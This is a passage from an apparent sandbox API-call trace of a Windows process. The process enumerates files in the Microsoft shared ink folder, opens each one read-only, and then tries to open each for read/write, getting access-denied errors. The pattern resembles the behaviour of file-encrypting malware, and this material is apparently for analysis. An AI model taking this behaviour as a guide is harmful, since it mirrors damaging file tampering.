lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.037] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.038] CloseHandle (hObject=0x368) returned 1 [0100.038] AreFileApisANSI () returned 1 [0100.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0100.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml") returned 62 [0100.038] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.038] GetLastError () returned 0x5 [0100.038] GetLastError () returned 0x5 [0100.038] SetLastError (dwErrCode=0x5) [0100.038] GetLastError () returned 0x5 [0100.038] SetLastError (dwErrCode=0x5) [0100.038] GetLastError () returned 0x5 [0100.038] SetLastError (dwErrCode=0x5) [0100.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0100.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.039] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c96711d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c96711d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c96711d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsjpn.xml", cAlternateFileName="")) returned 1 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0100.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.039] AreFileApisANSI () returned 1 [0100.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml", lpUsedDefaultChar=0x0) returned 62 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0100.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.040] AreFileApisANSI () returned 1 [0100.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0100.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml") returned 62 [0100.040] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.040] GetFileType (hFile=0x368) returned 0x1 [0100.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.040] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.040] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.041] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.041] CloseHandle (hObject=0x368) returned 1 [0100.041] AreFileApisANSI () returned 1 [0100.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ecf0 [0100.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml") returned 62 [0100.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.041] GetLastError () returned 0x5 [0100.041] GetLastError () returned 0x5 [0100.041] SetLastError (dwErrCode=0x5) [0100.041] GetLastError () returned 0x5 [0100.041] SetLastError (dwErrCode=0x5) [0100.041] GetLastError () returned 0x5 [0100.041] SetLastError (dwErrCode=0x5) [0100.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0100.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0100.041] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.042] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipskor.xml", cAlternateFileName="")) returned 1 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.042] AreFileApisANSI () returned 1 [0100.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml", lpUsedDefaultChar=0x0) returned 62 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0100.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0100.043] AreFileApisANSI () returned 1 [0100.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0100.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml") returned 62 [0100.043] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.043] GetFileType (hFile=0x368) returned 0x1 [0100.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.043] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.043] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.043] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.044] CloseHandle (hObject=0x368) returned 1 [0100.044] AreFileApisANSI () returned 1 [0100.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0100.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml") returned 62 [0100.044] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.044] GetLastError () returned 0x5 [0100.044] GetLastError () returned 0x5 [0100.044] SetLastError (dwErrCode=0x5) [0100.044] GetLastError () returned 0x5 [0100.044] SetLastError (dwErrCode=0x5) [0100.044] GetLastError () returned 0x5 [0100.044] SetLastError (dwErrCode=0x5) [0100.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0100.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0100.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.045] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe462e472, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe462e472, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="IpsMigrationPlugin.dll", cAlternateFileName="")) returned 1 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x603f8 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x603f8 | out: hHeap=0x20000) returned 1 [0100.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0100.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.045] AreFileApisANSI () returned 1 [0100.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll", lpUsedDefaultChar=0x0) returned 74 [0100.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0100.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.046] AreFileApisANSI () returned 1 [0100.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0100.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85120 [0100.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll") returned 74 [0100.046] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.046] GetFileType (hFile=0x368) returned 0x1 [0100.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0100.046] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.046] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.126] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.126] CloseHandle (hObject=0x368) returned 